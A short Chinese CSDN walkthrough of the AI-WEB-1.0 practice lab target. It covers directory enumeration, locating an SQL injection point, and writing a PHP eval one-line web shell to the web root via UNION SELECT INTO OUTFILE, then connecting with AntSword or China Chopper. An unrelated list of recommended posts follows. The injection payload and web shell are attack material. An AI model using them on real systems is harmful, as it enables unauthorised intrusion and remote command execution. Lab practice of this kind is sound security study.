CSDN AI-WEB-1.0 攻略

找到一个目标靶场的IP , 这里以172.16.1.98 为例

1、使用命令 /robots.txt 来确定目录

2、分别测试两个文件

均无法访问,可返回其根目录查询

3、到根目录,出现搜索框

4、输入ID为1

5、使用虚拟机kali的终端

搜索命令 dirsearch -u http://172.16.1.98/m3diNf0/

6、搜索文件 info.php

即可得到 WWW 所在的根目录

7、确定闭合方式 1'

8、确定字段

1' order by 3#

9、注入一句话"木马"

1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #

9、查看文件,木马是否注入成功

搜索 /s /up /sis.php

10、使用中国蚁键/中国菜刀等工具,进入该系统

++即可成功获取信息++

安全

网络安全人人有责,切勿知法犯法

相关推荐
allione7 分钟前
数据库中容易混淆的关键字alter/update...
数据库·sql
cqsztech11 分钟前
如何在Oracle linux9.6 安装docker软件
数据库·docker·oracle
交换机路由器测试之路12 分钟前
什么是CSMA/CD
网络·路由器·以太网·交换机
天涯路s12 分钟前
qt怎么将模块注册成插件
java·服务器·前端·qt
JIngJaneIL13 分钟前
基于Java民宿管理系统(源码+数据库+文档)
java·开发语言·数据库·vue.js·spring boot
只与明月听21 分钟前
FastAPI入门实战
前端·后端·python
脾气有点小暴25 分钟前
Tree Shaking 深度解析:原理、应用与实践
前端·vue.js
苏小瀚26 分钟前
[JavaSE] 网络原理(HTTP_HTTPS)
网络·tcp/ip·http
晚霞的不甘27 分钟前
社区、标准与未来:共建 Flutter 与 OpenHarmony 融合生态的可持续发展路径
安全·flutter·ui·架构
档案宝档案管理27 分钟前
档案管理效率低?档案管理系统如何实现从“人工管档”到“智能管档”?
大数据·数据库·人工智能·档案·档案管理